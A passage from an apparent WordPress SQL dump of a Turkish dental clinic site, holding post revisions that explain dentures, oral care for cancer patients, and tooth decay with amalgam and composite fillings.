protezler genel anlamda iki çeşittir:\r\n<ul>\r\n 	<li>Sabit protezler</li>\r\n 	<li>Hareketli protezler</li>\r\n</ul>\r\n<strong>Sabit protezler</strong>\r\n\r\n<img class=\"size-medium wp-image-6355 alignright\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/Sabit-Protez-Tedavisi-300x235.jpg\" alt=\"\" width=\"300\" height=\"235\" />Dişlerin ağızda görünen kısımlarının yerine yapılan ve hasta tarafından çıkarılamayan protezlerdir. Kaplama ya da porselen diş olarak da adlandırılabilirler.\r\n\r\nSabit protezler, Çürük veya başka bir nedenle aşırı madde kaybı olan dişlerin restorasyonunda, renklenmiş ve rengi geri döndürülemeyen dişlerde, şekil bozukluğu olan dişlerde yapılır. Dişler kaplama yapılacak şekilde biçimlendilir. Daha sonra ölçüsü alınıp laboratuarlarda hekiminizin yönlerdirmesi doğrultusunda hazırlanır. Provalar yapıldıktan sonra kaplamanız yapıştırılarak işlem bitirilir. Kaplamaların bakımı sağlıklı dişlerin bakımıyla aynı şekilde yapılmalıdır. İyi yapılmış bir kaplama fonksiyon açısından ve temizlenme açısından sağlıklı bir dişten farksız olmalıdır. Bu dişlerin yapımında porselen, değerli metal kombinasyonları, özel cam maddeler ve özel plastiklerden hekiminizin seçimi doğrultusunda yapılır.\r\n\r\nKöprüler ise eksik dişlerin yerine protez yapabilmek için komşu diğer dişlerden destek alınarak yapılan protezlerdir. Bu restorasyonların yapımında her iki komşu dişte aşındırmalar yapılır ve yapılan köpri tüm dişleri birbirine bağlar. Eksik dişlerin yerine köprü yapılmadığı taktirde hastanın komşu dişleri ve diğer çenedeki karşıt dişi, çekim boşluğuna doğru hareket eder. Bu nedenle bozulan diş kapanışı çürüklere ve diş kayıplarına yol açar. Kaplamada olduğu gibi diş hekiminiz tarafından destek olarak alınacak dişler şekillendirilip aynı işlemler gerçekleştirilerek yapılır. Kaplamalarınızın bakımı, rutin bakım işlemleri yanısıra boşluğa konulan parçanın alt kısmının özel Dental Pross’larla diş hekiminizin göstereceği şekilde temizlenerek yapılır.\r\n\r\n<strong>Hareketli protezler</strong>\r\n\r\n<img class=\"size-medium wp-image-6354 alignright\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/Hareketli-Protez-Tedavisi-300x235.jpg\" alt=\"\" width=\"300\" height=\"235\" />Hareketli protez, sabit protez yapılamayacak durumdaki diş kayıplarının giderilmesi amacıyla yapılan protezlerdir. Sabit protezlerden farklı olarak takıp çıkarılabilirler. Özel plastik veya metal plastik kombinasyonlarından yapılırlar. Estetiği ve fonksiyonu sağlamak amacıyla yapılır. Hareketli protez gerektiren vakalarda çok fazla diş eksikliği bulunduğundan, çiğneme fonksiyonunun yerine getirilmesi ve diğer kalan dişlerin zarar görmemesi için yapılması gerekir. Hareketli protezler, dişlerin tamamen ya da büyük çoğunluğunun kaybedildiği durumlarda yapılır.\r\n\r\nHareketli protezler, özel plastikler ve metallerin kombinasyonu veya vakaya göre sadece özel plastiklerden yapılır. Hareketli protezlerde kullanılan dişler genelde plastik dişlerden seçilir. Porselen dişler ağırlıkları ve kuvvetleri yumuşak dokulara uygun olmayan şekilde ilettiğinden ve plastikle iyi bir bağlantı sağlayamayacağından tavsiye edilmemektedir. Hareketli protezlerin bakımı için her yemekten sonra çıkarılıp fırçalanmalıdır. Günde bir kere özel temizleyici maddelerle temizlenmelidir. Bazı maddeler metal içeren protezlere zarar verebileceğinden hekime danışılmadan kullanılmamalıdır. Kullanmadığınız zamanlarda protezinizi temiz bir suyun içinde tutarak su kaybedip bozulmasına engel olabilirsiniz. Hareketli protezinizi 3 yılda bir kontrol ettirip gerekiyorsa değiştirmeniz gerekmektedir. Zamanla protez aşınıp, kırılabilir veya çene ile uyumunu kaybedebilir. Bu da çene kemiğine zarar verebilir.\r\n\r\nHareketli protezlerde ilk 1 ay çiğneme ve konuşma fonksiyonlarının yerine getirilmesi açısından alışma devresidir. Ayrıca protezin oluşturabileceği uyumsuzluklar (vuruklar) yapılacak kontrollerle giderilmelidir.\r\n\r\nBir dişin kaybı sağlığınıza birçok şekilde zarar verebilir. Kaybedilen dişin önündeki ve arkasındaki dişler bu boşluğa doğru eğilirler. Karşıt diş de çekim boşluğuna doğru uzar. Çünkü dişler temas etme eğilimindedir. Bu uzama ve eğilmeler sonucunda dişlerin dizilimi ve birbirleriyle kontakları bozulur. Bu da dişler arasında gıda artığı ve bakteri plağı birikimini artırır. Bu bölgelerin temizlenmesi zordur ve ve bu nedenlede diş çürüğü ve dişeti hastalıklarının oluşması riski artar. Tüm bu sorunlar kaybedilen dişin yerine konmasıyla önlenebilir. Ancak kayıp dişin yerine konması komşu dişlerin eğilmesi ve karşıt dişin uzamasından sonra biraz daha zor olur.\r\n\r\nTüm bu metodların avantajları ve dezavantajları vardır. Diş hekiminiz hangi yöntemin size en uygun olduğuna karar verebilmeniz için en büyük yardımcınızdır.\r\n\r\nHareketli protezlerde protezin ağızdaki doğal dişlere tutunması için kullanılan metal kancalara “Kroşe” denir. Bir çok insan ağızlarında bu metallerin görünmesinden rahatsızlık duyar. Ancak gelişen diş hekimliği teknolojisi bize bu konuda çok daha estetik bir çözüm sunmaktadır. “Hassas Tutucu”lar yada ateleskop kronlar kullanılarak dişlere tutunması sağlanırken metal kroşe görüntüsünün estetiği bozması da önlenir.\r\n\r\n<strong>Hassas Tutucular</strong>\r\nHareketli protezlerde ‘kroşe’ olarak adlandırılan ve protezin tutuculuğunu sağlamak için kullanılan metal parçaların yerine kullanılan sisteme ‘hassas tutucu’ denir. Dişsiz bölgenin önündeki dişler kaplamadaki gibi işlemlerden geçirilerek hassas tutucuların sabit parçası bu dişlere yapılan kaplamaya sabit olacak şekilde döküm olarak yapılır. Hareketli parçada yapılacak olan hareketli protezde yer alır. Kroşeler dışında hareketli parça, hareketli protezde tarif edildiği şekilde yapılır. Hassas tutucular, estetik ve tutuculuğun daha iyi olması, kroşelerin yol açabileceği yiyecek birikimleri sonucu ortaya çıkacak çürük ve diğer problemlerin oluşmaması açısından daha çok tercih edilirler.[/vc_column_text][/vc_column][/vc_row]', 'Protez Tedavisi', '', 'inherit', 'closed', 'closed', '', '6353-revision-v1', '', '', '2018-07-18 20:41:16', '2018-07-18 17:41:16', '', 6353, 'http://www.ze-dent.com/6353-revision-v1/', 0, 'revision', '', 0),
(6522, 1, '2018-07-18 20:43:38', '2018-07-18 17:43:38', '[vc_row][vc_column][vc_column_text]<strong>Ağız içi problemlerin ortaya çıkmasına neden olan kanser tedavileri hangileridir?</strong>\r\n<ul>\r\n 	<li>Kemoterapi (ilaç tedavisi),</li>\r\n 	<li>Radyoterapi (ışın tedavisi),</li>\r\n 	<li>Sakinleştirici ve ağrı kesici olarak kullanılan yardımcı ilaçlar,</li>\r\n 	<li>Baş boyun bölgesindeki dokuların cerrahi müdahale ile çıkarılması,</li>\r\n 	<li>Kemik iliği nakli,</li>\r\n 	<li>Bağışıklık sistemini güçlendirmek için kullanılan ilaçlar…</li>\r\n</ul>\r\n<strong>Kanser tedavisi öncesi ağız içinde ne gibi önlemler alınmalıdır?</strong>\r\n\r\nKanser tedavisi sırasında yalnızca acil tedaviler yapılabileceğinden ağız içinde hastalık oluşturabilecek her türlü önlemin önceden alınması gerekmektedir. Örneğin;\r\n<ul>\r\n 	<li>Ağız içinde rahatsızlıklara neden olan diş taşlarının temizlenmesi, hatalı dolgu ve protezlerin düzeltilmesi,</li>\r\n 	<li>Diş eti problemleri ve diş çürüklerinin tedavi edilmesi,</li>\r\n 	<li>Hastalardan ölçü alınarak özel kaşıkların hazırlanması. (Bu kaşıklar tedavi öncesi ve sonrasında dişlerin korunması için flor jeli uygulamasında kullanılmaktadır.)</li>\r\n</ul>\r\n<strong>Baş boyun bölgesine uygulanan radyasyonun ağız içindeki etkileri nelerdir?</strong>\r\n<ul>\r\n 	<li>Radyasyona bağlı ağız mukozasındaki hücre ölümleri, genellikle tedaviden 5-10 gün sonra başlayıp, 3-4 hafta sonra tamamen iyileşen ‘mukozit’ denilen küçük ağız yaralarının oluşmasına neden olur.</li>\r\n 	<li>Radyasyon, tükürük kalite ve miktarında azalmaya yol açar. Tükürük akışının bozulmasına bağlı olarak ağız kuruluğu başlar, takiben kanamalar meydana gelebilir. Tükürüğün çürüğü önleme, ağzı ve dişleri temizleme fonksiyonu azalır. Tat alma duyusunda bozulmalar, dişlerde soğuk-sıcak hassasiyeti, yutma, çiğneme ve konuşma fonksiyonlarında zorlanmalar olur.</li>\r\n 	<li>Radyasyona maruz kalmış kemikte hücre azalması ve oksijen yetersizliği nedeniyle yeterli iyileşmenin olmaması sonucu kemik dokusunun canlılığını kaybetmesi olan ‘osteoradyonekroz’ oluşur, özellikle alt çenede daha yaygındır.</li>\r\n 	<li>Radyoterapiden sonra tedavi sahasındaki damarlarda kan akımını azaltan bir daralma ve tıkanma söz konusu olur. Çiğneme kasları ve çene eklemindeki doku değişiklikleri ile sonuçlanan bu durum yutma, çiğneme ve konuşma fonksiyonlarında çok ciddi bir zorlanmaya neden olur.</li>\r\n 	<li>Radyasyon sahasında dişeti bağlarındaki zayıflamadan dolayı olan sallanma nedeniyle diş kayıplarına sıklıkla rastlanabilir.</li>\r\n</ul>\r\n<strong>Kemoterapinin ağız içinde neden olduğu sorunlar nelerdir?</strong>\r\n<ul>\r\n 	<li>Bazı kemoterapi ilaçları ağız yaralarına ve iltihaplara neden olabilir.</li>\r\n 	<li>Bakteri, virüs ve mantar enfeksiyonları, bağışıklık sisteminin zayıflamasıyla oldukça sık karşımıza çıkar.</li>\r\n 	<li>Tat alma duyusu değişebilir. Yiyeceklerin tadı daha tuzlu,ekşi ve metalik gelebilir. (Kemoterapi bitince tat alma duyusu da normale dönecektir.)</li>\r\n 	<li>Tedavide yardımcı olarak kullanılan sakinleştirici ve ağrı kesicilerin uzun süren kullanılmaları tükürük akışını azaltan, çürük oluşumunu artıran etkiler göstermektedir.</li>\r\n</ul>\r\n<strong>Kanser hastalarında ağız bakımı nasıl olmalıdır?</strong>\r\n<ul>\r\n 	<li>Hastalar ağız içi olumsuzlukların şiddetini azaltmak için ağız hijyenlerini korumaya teşvik edilmeli, günde 3-4 kez, özellikle yemeklerden sonra 30 dakika içinde ve yatmadan önce ağız temizliğini yapmalıdır.</li>\r\n 	<li>Diş fırçalama çok yumuşak bir fırça yardımıyla baskı uygulamaksızın antitartar, peroksit ihtiva etmeyen florür ve karbonat içeren bir diş macunu ile yapılmalıdır. İki ayrı diş fırçası değiştirilerek kullanılmalı ve klorheksidinli veya hipokloritli solüsyonlarda yıkanarak, kurutulmalıdır.</li>\r\n 	<li>Ağız duşu ve elektrikli diş fırçası kullanımı tavsiye edilmez.</li>\r\n 	<li>Hasta eğer dişipi kullanıyorsa mumlu ve şerit diş ipi kullanması önerilir eğer kullanmıyorsa kullanıma alıştırmak için uygun bir zaman değildir.</li>\r\n 	<li>Dişler fırçaladıktan sonra günde en az dört kez, sabah, öğle, akşam yemeğinden sonra ve gece yatmadan önce 1 su bardağı kaynatılıp soğutulmuş suya yarım çay kaşığı karbonat (yemek sodası) ilave edilerek hazırlanan ağız gargarası yapılması tavsiye edilir.</li>\r\n 	<li>Özellikle kemoterapiden 7-10 gün sonraki dönemde dişler fırçalanmamalıdır, çünkü bu dönemde dişeti kanaması ve enfeksiyon riski vardır. Fırçalamak yerine ağız gargaraları ve karbonatlı gargara ile ağız temizlenmelidir.</li>\r\n 	<li>Kemoterapi sırasında görülebilen kusmalardan sonra karbonatlı su ile hasta sık sık gargara yapmalıdır.</li>\r\n 	<li>Eğer diş macunu ağzı veya dişleri sızlatıyor, fırçalama sırasında mide bulantısı oluyorsa, ağız karbonatlı gargara ile temizlenmelidir.</li>\r\n 	<li>Kanser tedavisi sırasında mümkünse hareketli protezler takılmamalıdır.</li>\r\n 	<li>Tedavi sonrası dişler düzenli fırçalanmalı, protezler her yemekten sonra ve gece yatarken kesinlikle ağzınızdan çıkarılarak temizlenmelidir. Damağa iyi oturmayan takma dişler kullanılmamalıdır. Protezler temizleyici sıvılar içinde saklanmalıdır.</li>\r\n 	<li>Mantar enfeksiyonu varsa tedavi sadece ağız içi dokulara değil protezlere de uygulanmalıdır.</li>\r\n 	<li>Kurumaya karşı dudaklar vazelin veya dudak yağları ile nemlendirilmelidir.</li>\r\n</ul>\r\n<strong>Ağız kurumasında alınacak genel önlemler</strong>\r\n<ul>\r\n 	<li>Sodalı gargaralar,</li>\r\n 	<li>Sakız, şeker, buz parçaları,</li>\r\n 	<li>Sıvı içeceklerin sık sık alınması,</li>\r\n 	<li>Asitli veya baharatlı gıdalardan kaçınma,</li>\r\n 	<li>Havayı nemlendirme,</li>\r\n 	<li>Tükürük akışını hızlandıran preparatlar…</li>\r\n 	<li>Kolay yutmayı sağlamak için sulu yiyecekler tercih edilmeli ve günde en az iki litre sıvı içilmelidir.</li>\r\n 	<li>Tahrişe neden olabilecek asitli, çok sıcak ve çok soğuk içeceklerden, alkol ve tütün kullanımından kaçınılmalıdır.</li>\r\n 	<li>Baş- boyun bölgesine uygulanan radyoterapide, yaşam boyu süren flor uygulaması, mevcut dişlerin muhafaza edilmesi ve kemik yıkımının önlenmesi açısından hayati önem taşır. flor uygulaması için özel ölçü kaşıkları hazırlanır. Florid kaşıklara konur, hasta ağzına yerleştirilir ve ısırtılır. Kaşıklar ağızda en az 5 dakika bırakılır sonra kaşıklar çıkarılır ve ağız durulanır. En az 30 dk. süreyle yenmez içilmez ve diş fırçalanmaz. Florid uygulaması günde 1-2 kez yapılmalıdır. Tüm bu önlemlere rağmen ağzınızda, görünüm, his veya tat yönünden bir değişiklik olduğunda doktorunuza veya hemşirenize haber vermelisiniz.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Kanser Hastalarında Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '6285-revision-v1', '', '', '2018-07-18 20:43:38', '2018-07-18 17:43:38', '', 6285, 'http://www.ze-dent.com/6285-revision-v1/', 0, 'revision', '', 0),
(6523, 1, '2018-07-18 20:44:22', '2018-07-18 17:44:22', '[vc_row][vc_column][vc_column_text]<strong>Dişler neden çürür?</strong>\n\nAğızda bulunan bakterilerden oluşan bakteri plağı, şekerli ve unlu yiyeceklerin ağızda kalan artıklarından asit oluşturabilmektedir. Bu asitler, dişlerin mineral dokusunu çözerek dişin minesinin bozulmasına ve sonuçta da diş çürüğünün başlamasına ve diş hekimlerinin \"kavite\" dedikleri oyuklara neden olmaktadırlar. Bunlar daha çok koyu renklenmelerle birlikte görülen oyuklardır.\n\nŞekerli ve unlu yiyeceklerle bakterilerin buluşması sonucunda çürükler oluştuğuna göre herkes için bir tehlike var demektir. Ancak beslenmelerinde karbonhidratlı ve şekerli yiyeceklerin oranı çok yüksek olanlar bir de sularında florür oranı çok düşükse çok daha fazla çürük tehlikesi altındadırlar. Bakteri plağı tarafından oluşturulan aside karşı tükürük doğal bir savunma mekanizması oluştursa da tek başına çürüğü önleyemez. Tükürük akışını ve miktarını azaltan hastalıklar ya da ilaçlar da çürük oluşumunu hızlandırmaktadırlar. Bu nedenle de diş hekimleri tükürük akışını artırdığı için şekersiz sakızları sıklıkla önerirler.\n\n<strong>Dişlerin çürümesini önlemek için neler yapılmalıdır?</strong>\n\n<strong>Dişlerin çürümesini önlemek için neler yapılmalıdır? ile ilgili videolar</strong>\n<ul>\n 	<li>Sabah kahvaltısından sonra ve akşam yatmadan önce dişlerin fırçalanması ve her gün diş ipliğinin düzenli kullanılması en etkili yoldur.</li>\n 	<li>Yiyecek artıkları en çok dişlerin çiğneme yüzeylerindeki girintilerde ve dişlerin birbirine değdiği ara yüzeylerde biriktiği için, diş fırçaları küçük başlı seçilmelidir. Dişlerin iç yüzeyleri, dış yüzeyleri, çiğneyici yüzeyleri ve dilin üstü fırçalanmalı ve ara yüzlerde diş ipliği kullanılmalıdır.</li>\n 	<li>Fırçalar, orta derecede sert ya da yumuşak kıllı olmalı ve belirli aralıklarda değiştirilmelidirler. Fırça kıllarının aşınmamış olması ve bakteri taşımayacak bir şekilde muhafaza edilmesi gerekmektedir. Asla başkasının diş fırçası kullanılmamalıdır.</li>\n 	<li>Diş fırçalama sırasında florürlü bir diş macunu kullanılarak, florürün diş çürüğünü önlemedeki rolünden yararlanılmalıdır. Florürlü macunlara yardımcı olarak aynı zamanda ağız kokusunu gidererek ferahlık ve temizlik hissi veren florürlü gargaralar da kullanılabilir.</li>\n 	<li>Şekerli yiyecekleri ana öğünlerde tüketmeye çalışmak ve yemek aralarında bir şey yememeye gayret etmek de diğer bir önlemdir.</li>\n 	<li>Çürüğün bir ilacı yoktur bu nedenle diş hekimine muntazam aralıklarla başvurmak bir çürüğü önlemek ya da erken yakalamada en iyi yoldur. Ayrıca sıcak ve soğuğa duyarlı dişler ya da ağrılı dişlerde veya tebeşirimsi renkte olan başlangıç çürükleri, kahverengi renklemeler ve oyuklar gibi durumlarda vakit geçirilmeden hekime başvurulması tedavinin şeklini değiştirecek ve zorluğunu azaltacaktır.</li>\n</ul>\n<strong>Çürük tedavisinde kullanılan malzemeler nelerdir?</strong>\n<ul>\n 	<li>Çinko içerikli genelde geçici amaçla kullanılan maddeler,</li>\n 	<li>Kalsiyum içeren dişi iyileştirici özelliğe sahip maddeler,</li>\n 	<li>Gümüş, kalay, çinko, altın içeren dayanıklı maddeler,</li>\n 	<li>Cam, alüminyum, fosfat ve yapay reçinelerin bir karışımı olan estetik amaçlı kullanılan maddeler,</li>\n 	<li>Alüminyum silikat cam partiküllerinden oluşan çok çeşitli amaçlar ile kullanılan maddeler,</li>\n 	<li>Ağız dışında hazırlanıp dişe yapıştırılan blok malzemeler.</li>\n</ul>\n<strong>Amalgam Dolgu (Metal Dolgu) nedir?</strong>\n\nAmalgam dolgular gümüş dolgular olarak da tanımlanır. Amalgam; gümüş, kalay ve bakır alaşımının, cıva ile karıştırılması ile elde edilir. Karışımın %45-50`sini oluşturan civa, metalleri birbirine bağlayarak dayanıklı bir dolgu malzemesi yaratmış olur. Amalgam dolgular, 150 yıldan beri geliştirilerek kullanılmaktadır.\nAmalgam hala en zararsız, en uzun ömürlü ve en ucuz dolgu maddesidir. Yılda, bir milyardan fazla amalgam dolgu yapıldığı hesaplanmıştır. Diğer dolgu maddelerine oranla çok daha kısa zamanda ve kolay uygulanabilirler. Porselen, altın ve beyaz dolgular gibi dolgu malzemeleri hem daha pahalıdırlar hem de daha çok zaman ve dikkat isterler. Ayrıca altının dışındakiler amalgam kadar uzun ömürlü değildir. Amalgam ancak civaya alerjisi kesin olarak tespit edilenlerde kullanılmamalıdır ki, bu da yüzde birden çok daha düşük bir olasılıktır. Gerekmediğinde amalgam dolgular sökülmemelidir. Çünkü hem gereksiz masraf getirmekte hem de dişe zarar verme olasılığını artırmaktadır.\n\n<strong>Amalgamdaki civa zararlı mıdır?</strong>\n\nAmalgam dolgudaki civa zehirli değildir. Civa diğer metallerle birleştiğinde kimyasal yapısı değişir ve zararsız hale geçer. Çiğneme ve öğütme sonucunda ağızda açığa çıkan civa miktarı su, hava ve yiyeceklerde alınan miktardan çok daha küçüktür. Bütün bilimsel araştırmalarla civanın zararsız olduğu sonucuna varılmıştır. Amalgamlar söküldüğünde civanın oluşturduğu düşünülen bazı hastalıkların iyileştiği iddia edildiği halde bilimsel olarak ispatlanamamıştır.\n\n<strong>Amalgam restorasyon sonrası nelere dikkat edilmelidir?</strong>\n<ul>\n 	<li>Uygulamanın yapıldığı tarafın en az bir saat kullanılmaması ve takip eden 24 saat içinde dikkatli olunarak sert şeylerin o bölgede çiğnememesi gerekmektedir.</li>\n 	<li>Hekim işlemden 24 saat geçtikten sonra polisaj işlemi için ikinci bir randevu vermelidir. Bu uygulama, hekime, hem amalgamın metalik özelliklerini iyileştirme hem de kullanım sonrası restorasyonun anatomik ve fonksiyonel olarak tekrar gözden geçirilmesi olanağını sağlayacaktır.</li>\n 	<li>Amalgam dolgulardan sonra kısa süreli bir sıcak-soğuk duyarlılığı olabilmekte ve bu zamanla kaybolmaktadır. Ancak ender olsa da bazı kişilerde ağızda çeşitli metaller bulunduğunda ya da çatal gibi başka bir metal girdiğinde elektriklenmeden doğan hassasiyetler olabilmektedir. Geçmeyen duyarlılıklarda duyarlılığın yalnızca bu sebepten olduğuna emin olduktan sonra restorasyonun metal olmayan bir restoratif madde ile değiştirilmesi çözüm olabilir.</li>\n</ul>\n<strong>Kompozit Dolgu (diş renginde dolgu) nasıl uygulanır?</strong>\n\nKompozit reçine, içinde silikon dioksit parçacıkları olan bir plastik karışımdır. Diş renginde olduğu için beyaz dolgu olarak tanımlanırlar. 1960`larda yalnızca ön dişlerde kullanıldıkları halde materyalin ileri derecede geliştirilmesiyle çiğneme basınçlarına dayanıklı ve daha az aşınan bir dolgu maddesi olarak arka dişlerde de başarılı olarak uygulanabilmektedirler.\n\nKompozit dolgular, hazırlanmış kavitelere tabaka tabaka yerleştirilir ve her tabaka özel bir ışık ile sertleştirilir. Bu işlem bitince kompozit dolgular dişe göre şekillendirilir ve düzeltilir. Bütün bu işlemler amalgam dolgu işleminden daha uzun sürer. Ancak amalgamın en az iki katı kadar daha pahalıdır. Kompozit dolguların ağızda kalma süresi de 7-10 yıldır ki bu süre amalgamın ömrüne yakındır. Ancak çok büyük dolgularda durum amalgamın lehinedir.\nBu dolguların en büyük avantajları estetik olmalarıdır. Ayrıca bu dolgular dişlere iyice bağlandığı için diş dokularını destekler, kırılmaları ve sıcaklık geçmesini engeller. Kompozitler, yalnızca çürükleri restore etmek için değil, dişlerin rengini ve biçimini değiştirerek kozmetik etkileri için de kullanılabilmektedirler. En önemli dezavantajı işlem sonrası duyarlılıkların olmasıdır. Dolguların renkleri, kahve, çay gibi boyayıcı yiyeceklerle de hafifçe değişebilmektedir.\n\n<strong>Kompozit restorasyon sonrası nelere dikkat edilmelidir?</strong>\n<ul>\n 	<li>Kompozitlerde de artık aynı seansta polisaj işlemi yapılabilmektedir. Ancak çok büyük restorasyonlar ya da çok diş için yapılan seri restorasyonlarda hastanın bir defa daha kontrole gitmesi gerekebilir.</li>\n 	<li>Bu mateyallerle ön dişlerde çok büyük kayıplar restore edilebilmekte bu nedenle hastalar ısırma işlemi sırasında dikkatli olmalıdır.</li>\n 	<li>Özellikle fasial yüzde yapılan uygulamalardan sonra ne kadar iyi polisaj yapılmış olsa da boyayabilen yiyecek ve içecekler dolguların renklerini değiştirebilir.</li>\n 	<li>Aşınma nedeni ile restore edilmiş dişlerde daha çok dikkat edilmesi gereken şey çok sert olmayan diş fırçaları kullanmak ve fırçalama yöntemlerinde düzeltmeler yapabilmektir.</li>\n</ul>\n[/vc_column_text][/vc_column][/vc_row]', 'Diş Çürümesi ve Dolgular', '', 'inherit', 'closed', 'closed', '', '6254-autosave-v1', '', '', '2018-07-18 20:44:22', '2018-07-18 17:44:22', '', 6254, 'http://www.ze-dent.com/6254-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6524, 1, '2018-07-18 20:44:50', '2018-07-18 17:44:50', '[vc_row][vc_column][vc_column_text]<strong>Dişler neden çürür?</strong>\r\n\r\nAğızda bulunan bakterilerden oluşan bakteri plağı, şekerli ve unlu yiyeceklerin ağızda kalan artıklarından asit oluşturabilmektedir. Bu asitler, dişlerin mineral dokusunu çözerek dişin minesinin bozulmasına ve sonuçta da diş çürüğünün başlamasına ve diş hekimlerinin \"kavite\" dedikleri oyuklara neden olmaktadırlar. Bunlar daha çok koyu renklenmelerle birlikte görülen oyuklardır.\r\n\r\nŞekerli ve unlu yiyeceklerle bakterilerin buluşması sonucunda çürükler oluştuğuna göre herkes için bir tehlike var demektir. Ancak beslenmelerinde karbonhidratlı ve şekerli yiyeceklerin oranı çok yüksek olanlar bir de sularında florür oranı çok düşükse çok daha fazla çürük tehlikesi altındadırlar. Bakteri plağı tarafından oluşturulan aside karşı tükürük doğal bir savunma mekanizması oluştursa da tek başına çürüğü önleyemez. Tükürük akışını ve miktarını azaltan hastalıklar ya da ilaçlar da çürük oluşumunu hızlandırmaktadırlar. Bu nedenle de diş hekimleri tükürük akışını artırdığı için şekersiz sakızları sıklıkla önerirler.\r\n\r\n<strong>Dişlerin çürümesini önlemek için neler yapılmalıdır?</strong>\r\n<ul>\r\n 	<li>Sabah kahvaltısından sonra ve akşam yatmadan önce dişlerin fırçalanması ve her gün diş ipliğinin düzenli kullanılması en etkili yoldur.</li>\r\n 	<li>Yiyecek artıkları en çok dişlerin çiğneme yüzeylerindeki girintilerde ve dişlerin birbirine değdiği ara yüzeylerde biriktiği için, diş fırçaları küçük başlı seçilmelidir. Dişlerin iç yüzeyleri, dış yüzeyleri, çiğneyici yüzeyleri ve dilin üstü fırçalanmalı ve ara yüzlerde diş ipliği kullanılmalıdır.</li>\r\n 	<li>Fırçalar, orta derecede sert ya da yumuşak kıllı olmalı ve belirli aralıklarda değiştirilmelidirler. Fırça kıllarının aşınmamış olması ve bakteri taşımayacak bir şekilde muhafaza edilmesi gerekmektedir. Asla başkasının diş fırçası kullanılmamalıdır.</li>\r\n 	<li>Diş fırçalama sırasında florürlü bir diş macunu kullanılarak, florürün diş çürüğünü önlemedeki rolünden yararlanılmalıdır. Florürlü macunlara yardımcı olarak aynı zamanda ağız kokusunu gidererek ferahlık ve temizlik hissi veren florürlü gargaralar da kullanılabilir.</li>\r\n 	<li>Şekerli yiyecekleri ana öğünlerde tüketmeye çalışmak ve yemek aralarında bir şey yememeye gayret etmek de diğer bir önlemdir.</li>\r\n 	<li>Çürüğün bir ilacı yoktur bu nedenle diş hekimine muntazam aralıklarla başvurmak bir çürüğü önlemek ya da erken yakalamada en iyi yoldur. Ayrıca sıcak ve soğuğa duyarlı dişler ya da ağrılı dişlerde veya tebeşirimsi renkte olan başlangıç çürükleri, kahverengi renklemeler ve oyuklar gibi durumlarda vakit geçirilmeden hekime başvurulması tedavinin şeklini değiştirecek ve zorluğunu azaltacaktır.</li>\r\n</ul>\r\n<strong>Çürük tedavisinde kullanılan malzemeler nelerdir?</strong>\r\n<ul>\r\n 	<li>Çinko içerikli genelde geçici amaçla kullanılan maddeler,</li>\r\n 	<li>Kalsiyum içeren dişi iyileştirici özelliğe sahip maddeler,</li>\r\n 	<li>Gümüş, kalay, çinko, altın içeren dayanıklı maddeler,</li>\r\n 	<li>Cam, alüminyum, fosfat ve yapay reçinelerin bir karışımı olan estetik amaçlı kullanılan maddeler,</li>\r\n 	<li>Alüminyum silikat cam partiküllerinden oluşan çok çeşitli amaçlar ile kullanılan maddeler,</li>\r\n 	<li>Ağız dışında hazırlanıp dişe yapıştırılan blok malzemeler.</li>\r\n</ul>\r\n<strong>Amalgam Dolgu (Metal Dolgu) nedir?</strong>\r\n\r\nAmalgam dolgular gümüş dolgular olarak da tanımlanır. Amalgam; gümüş, kalay ve bakır alaşımının, cıva ile karıştırılması ile elde edilir. Karışımın %45-50`sini oluşturan civa, metalleri birbirine bağlayarak dayanıklı bir dolgu malzemesi yaratmış olur. Amalgam dolgular, 150 yıldan beri geliştirilerek kullanılmaktadır.\r\nAmalgam hala en zararsız, en uzun ömürlü ve en ucuz dolgu maddesidir. Yılda, bir milyardan fazla amalgam dolgu yapıldığı hesaplanmıştır. Diğer dolgu maddelerine oranla çok daha kısa zamanda ve kolay uygulanabilirler. Porselen, altın ve beyaz dolgular gibi dolgu malzemeleri hem daha pahalıdırlar hem de daha çok zaman ve dikkat isterler. Ayrıca altının dışındakiler amalgam kadar uzun ömürlü değildir. Amalgam ancak civaya alerjisi kesin olarak tespit edilenlerde kullanılmamalıdır ki, bu da yüzde birden çok daha düşük bir olasılıktır. Gerekmediğinde amalgam dolgular sökülmemelidir. Çünkü hem gereksiz masraf getirmekte hem de dişe zarar verme olasılığını artırmaktadır.\r\n\r\n<strong>Amalgamdaki civa zararlı mıdır?</strong>\r\n\r\nAmalgam dolgudaki civa zehirli değildir. Civa diğer metallerle birleştiğinde kimyasal yapısı değişir ve zararsız hale geçer. Çiğneme ve öğütme sonucunda ağızda açığa çıkan civa miktarı su, hava ve yiyeceklerde alınan miktardan çok daha küçüktür. Bütün bilimsel araştırmalarla civanın zararsız olduğu sonucuna varılmıştır. Amalgamlar söküldüğünde civanın oluşturduğu düşünülen bazı hastalıkların iyileştiği iddia edildiği halde bilimsel olarak ispatlanamamıştır.\r\n\r\n<strong>Amalgam restorasyon sonrası nelere dikkat edilmelidir?</strong>\r\n<ul>\r\n 	<li>Uygulamanın yapıldığı tarafın en az bir saat kullanılmaması ve takip eden 24 saat içinde dikkatli olunarak sert şeylerin o bölgede çiğnememesi gerekmektedir.</li>\r\n 	<li>Hekim işlemden 24 saat geçtikten sonra polisaj işlemi için ikinci bir randevu vermelidir. Bu uygulama, hekime, hem amalgamın metalik özelliklerini iyileştirme hem de kullanım sonrası restorasyonun anatomik ve fonksiyonel olarak tekrar gözden geçirilmesi olanağını sağlayacaktır.</li>\r\n 	<li>Amalgam dolgulardan sonra kısa süreli bir sıcak-soğuk duyarlılığı olabilmekte ve bu zamanla kaybolmaktadır. Ancak ender olsa da bazı kişilerde ağızda çeşitli metaller bulunduğunda ya da çatal gibi başka bir metal girdiğinde elektriklenmeden doğan hassasiyetler olabilmektedir. Geçmeyen duyarlılıklarda duyarlılığın yalnızca bu sebepten olduğuna emin olduktan sonra restorasyonun metal olmayan bir restoratif madde ile değiştirilmesi çözüm 